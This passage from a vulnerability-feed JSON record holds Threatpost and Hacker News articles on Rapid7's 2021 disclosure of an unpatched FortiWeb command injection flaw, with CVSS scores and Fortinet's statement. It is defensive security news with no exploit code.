industry.\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the [Fortinet PSIRT Policy page](<https://www.fortiguard.com/psirt_policy>), which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. As such, we had expected that Rapid7 hold any findings prior to the end of the our [90-day Responsible disclosure window](<https://www.fortiguard.com/zeroday/responsible-disclosure>). We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window.\u201d\n\nFor now, Rapid7 offered straightforward advice:\n\n\u201cIn the absence of a patch, users are advised to disable the FortiWeb device\u2019s management interface from untrusted networks, which would include the internet,\u201d according to Rapid7. \u201cGenerally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway \u2014 instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.\u201d\n\nThe Rapid7 researchers said that the vulnerability appears to be related to [CVE-2021-22123](<https://www.fortiguard.com/psirt/FG-IR-20-120>), which was patched in June.\n\n## **Fortinet: Popular for Exploit**\n\nThe vendor [is no stranger](<https://threatpost.com/fortigate-vpn-default-config-mitm-attacks/159586/>) to cybersecurity bugs in its platforms, and Fortinet\u2019s cybersecurity products are popular as exploitation avenues with cyberattackers, including nation-state actors. Users should prepare to patch quickly.\n\nIn April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) various advanced persistent threats (APTs) were actively exploiting three security vulnerabilities in the Fortinet SSL VPN for espionage. Exploits for CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812 were being used for to gain a foothold within networks before moving laterally and carrying out recon, they warned.\n\nOne of those bugs, a Fortinet vulnerability in FortiOS, [was also seen](<https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/>) being used to deliver a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.\n\n_**This post was updated August 18 at 1:30 p.m. ET with a statement from Fortinet.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T12:07:33", "type": "threatpost", "title": "Unpatched Fortinet Bug Allows Firewall Takeovers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-18T12:07:33", "id": "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "href": "https://threatpost.com/unpatched-fortinet-bug-firewall-takeovers/168764/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:13", "description": "[](<https://thehackernews.com/images/-iRDFz4kb2_c/YRyAnCXcgbI/AAAAAAAADjw/9zUdSCDaZ3wAdT6A32p1ugpUnmn7m6WagCLcBGAsYHQ/s0/Fortinet-zero-day.jpg>)\n\nDetails have emerged about a new unpatched security vulnerability in Fortinet's web application firewall (WAF) appliances that could be abused by a remote, authenticated attacker to execute malicious commands on the system.\n\n\"An OS command injection vulnerability in FortiWeb's management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page,\" cybersecurity firm Rapid7 [said](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) in an advisory published Tuesday. \"This vulnerability appears to be related to [CVE-2021-22123](<https://nvd.nist.gov/vuln/detail/CVE-2021-22123>), which was addressed in [FG-IR-20-120](<https://www.fortiguard.com/psirt/FG-IR-20-120>).\"\n\nRapid7 said it discovered and reported the issue in June 2021. Fortinet is expected to release a patch at the end of August with version Fortiweb 6.4.1.\n\nThe command injection flaw is yet to be assigned a CVE identifier, but it has a severity rating of 8.7 on the CVSS scoring system. Successful exploitation of the vulnerability can allow authenticated attackers to execute arbitrary commands as the root user on the underlying system via the SAML server configuration page.\n\n\"An attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\" Rapid7's Tod Beardsley said. \"They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ.\"\n\nRapid7 also warns that while authentication is a prerequisite for achieving arbitrary command execution, the exploit could be chained with an authentication bypass flaw, such as [CVE-2020-29015](<https://nvd.nist.gov/vuln/detail/CVE-2020-29015>). In the interim, users are advised to block access to the FortiWeb device's management interface from untrusted networks, including taking steps to prevent direct exposure to the internet.\n\nAlthough there is no evidence that the new security issue has been exploited in the wild, it's worth noting that unpatched Fortinet servers have been a lucrative target for financially motivated and state-sponsored threat actors alike.\n\nEarlier this April, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://www.ic3.gov/Media/News/2021/210402.pdf>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) to compromise systems belonging to government and commercial entities.\n\nIn the same month, Russian cybersecurity company Kaspersky [revealed](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) that threat actors exploited the CVE-2018-13379 vulnerability in FortiGate VPN servers to gain access to enterprise networks in European countries to deploy the Cring ransomware.\n\n**_Update: _**Fortinet shared the following statement with The Hacker News:\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the Fortinet PSIRT Policy page, which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. As such, we had expected that Rapid7 hold any findings prior to the end of our 90-day Responsible disclosure window. We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window. We are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week.\u201d\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-18T03:41:00", "type": "thn", "title": "Unpatched Remote Hacking Flaw Disclosed in Fortinet's FortiWeb WAF", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-19T06:50:20", "id": "THN:FCBB400B24C7B24CD6B5136FA8BE38D3", "href": "https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}